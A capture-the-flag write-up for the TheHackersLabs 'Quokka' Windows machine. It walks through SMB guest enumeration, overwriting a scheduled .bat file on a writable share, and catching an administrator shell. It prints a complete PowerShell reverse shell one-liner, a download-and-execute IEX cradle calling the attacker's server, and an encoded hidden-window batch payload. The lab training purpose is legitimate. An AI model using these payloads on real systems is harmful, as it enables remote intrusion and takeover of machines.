Quokka – TheHackersLabs Link to heading
- OS: Linux
- Difficulty: Easy
- Platform: TheHackersLabs
Summary Link to heading
“Quokka” is an easy machine from TheHackersLabs
platform. After inspecting shared resources through SMB
service for this machine, we find a .bat
script that is being executed every minute. Since we do have permissions to overwrite this file, we overwrite with a malicious file to get access to the victim machine. The shell we obtain is from a priviledged user, pwning the machine.
User Link to heading
Starting with a quick Nmap
scan:
❯ sudo nmap -sS -p- --min-rate=5000 --open -n -Pn -vvv 10.20.1.145
We can see multiple ports open. Among them we have: 80
HTTP
with Microsoft Internet Information Services
, 135
Microsoft RPC
, 445
Server Message Block
(SMB
), 5985
Windows Remote Management
(WinRM
).
Checking their versions with and applying some recognition scripts -sVC
flag returns:
❯ sudo nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.20.1.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:53 -03
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.20.1.145
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Portfolio y Noticias Tech de Quokka
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:FF:0F:BA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-03T07:53:59
|_ start_date: 2024-11-03T07:44:25
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ff:0f:ba (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-03T08:53:59+01:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.16 seconds
Visiting http://10.20.1.145
(the victim machine site HTTP
page) shows kind of a blog about cybersecurity.
But the site does not present much more info besides this topic.
From Nmap
scan output I can see that SMB
service allows guest
login. We can use this access to, first, see if we have any shares with NetExec
:
❯ nxc smb 10.20.1.145 -u 'guest' -p '' --shares
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Enumerated shares
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ Compartido READ,WRITE
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
and we do have shared resource called Compartido
.
We can also use NetExec
and --rid-brute
to see if we can enumerate users:
❯ nxc smb 10.20.1.145 -u 'guest' -p '' --rid-brute
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 500: WIN-VRU3GG3DPLJ\Administrador (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 501: WIN-VRU3GG3DPLJ\Invitado (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 503: WIN-VRU3GG3DPLJ\DefaultAccount (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 513: WIN-VRU3GG3DPLJ\Ninguno (SidTypeGroup)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 1000: WIN-VRU3GG3DPLJ\Omar (SidTypeUser)
SMB 10.20.1.145 445 WIN-VRU3GG3DPLJ 1001: WIN-VRU3GG3DPLJ\0mar (SidTypeUser)
We have 2 potential users: Omar
and 0mar
.
We can then use smbclient
to enumerate the files within Compartidos
share with the command:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido -c 'recurse; ls'
. D 0 Sun Nov 3 05:22:23 2024
.. D 0 Sun Nov 3 05:22:23 2024
Documentación D 0 Sun Oct 27 11:33:53 2024
Logs D 0 Sun Oct 27 11:33:54 2024
Proyectos D 0 Sun Oct 27 11:33:54 2024
<SNIP>
Those are a lot of files.
I will download all of them connecting to this shared resource with smbclient
as guest
user and running:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'recurse ON; prompt OFF; mget *'
getting file \Documentación\Diagrama_Flujo.pptx of size 0 as Documentación/Diagrama_Flujo.pptx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Informe_Proyecto.pdf of size 0 as Documentación/Informe_Proyecto.pdf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Archivos_Antiguos\Antiguo_Informe.docx of size 0 as Documentación/Archivos_Antiguos/Antiguo_Informe.docx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
<SNIP>
Eventually, after inspecting some files, we find a script named mantenimiento.bat
with the content:
@echo off
:: Mantenimiento del sistema de copias de seguridad
:: Este script es ejecutado cada minuto
REM Pista: Tal vez haya algo ms aqu...
:: Reverse shell a Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.36:8000/shell.ps1')"
:: Fin del script
exit
The hint says this script is executed every minute. We also had WRITE
permissions over this shared resource. What if we replace this .bat
script by a new one? For this we will create 2 files, a cradle.ps1
file and a file named rev.ps1
. I usually do this in Windows
machines just to check if Windows Defender
blocks the reverse shell. Therefore, first grab a reverse shell Powershell oneliner script from Nishang, copy and adapt it to our attacker machine:
$client = New-Object System.Net.Sockets.TCPClient('10.20.1.110',443);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
where 10.20.1.110
is our attacker IP and 443
the port I will start listening with netcat
to obtain a reverse shell. I save this code into a file named rev.ps1
.
Then, I create a file named cradle.ps1
with the content:
IEX(New-Object Net.WebClient).downloadString('http://10.20.1.110:8080/rev.ps1')
Encode this payload to pass it to Powershell
:
❯ cat cradle.ps1 | iconv -t utf-16le | base64 -w0; echo
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA==
and write a file named exploit.bat
with the content:
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="
exit
Start a listener with netcat
on port 443
in a terminal and, in another one, expose the files in a temporal Python
HTTP
server on port 8080
:
❯ ls -la && python3 -m http.server 8080
total 16
drwxrwxr-x 2 gunzf0x gunzf0x 4096 Nov 3 05:46 .
drwxrwxr-x 5 gunzf0x gunzf0x 4096 Nov 3 04:49 ..
-rw-rw-r-- 1 gunzf0x gunzf0x 80 Nov 3 05:46 cradle.ps1
-rw-rw-r-- 1 gunzf0x gunzf0x 501 Nov 3 05:46 rev.ps1
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Finally, since we assume that the mantenimiento.bat
script is running every minute (as the hint said), just upload exploit.bat
as mantenimiento.bat
with smbclient
replacing the original file:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; put exploit.bat mantenimiento.bat'
putting file exploit.bat as \Proyectos\Quokka\Código\mantenimiento.bat (298.8 kb/s) (average 298.8 kb/s)
We can check that our file has been uploaded checking the date of the files:
❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; ls'
. D 0 Sun Oct 27 11:58:54 2024
.. D 0 Sun Oct 27 11:58:54 2024
index.html A 52 Sun Oct 27 11:33:54 2024
mantenimiento - copia.bat A 1252 Sun Oct 27 11:41:43 2024
mantenimiento.bat A 306 Sun Nov 3 05:58:38 2024
README.md A 56 Sun Oct 27 11:33:54 2024
7735807 blocks of size 4096. 4637866 blocks available
It is different and, therefore, modified.
After some seconds, we get a request in our Python
HTTP
server, and get a shell as administrador
user:
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.20.1.110] from (UNKNOWN) [10.20.1.145] 49746
whoami
win-vru3gg3dplj\administrador
PS C:\Windows\system32>
This is a priviledged user. GG.
We can finally read both flags:
PS C:\Windows\system32> type C:\Users\0mar\Desktop\user.txt
9OWi***************
PS C:\Windows\system32> type C:\Users\Administrador\Desktop\admin.txt
j9eC********************
~Happy Hacking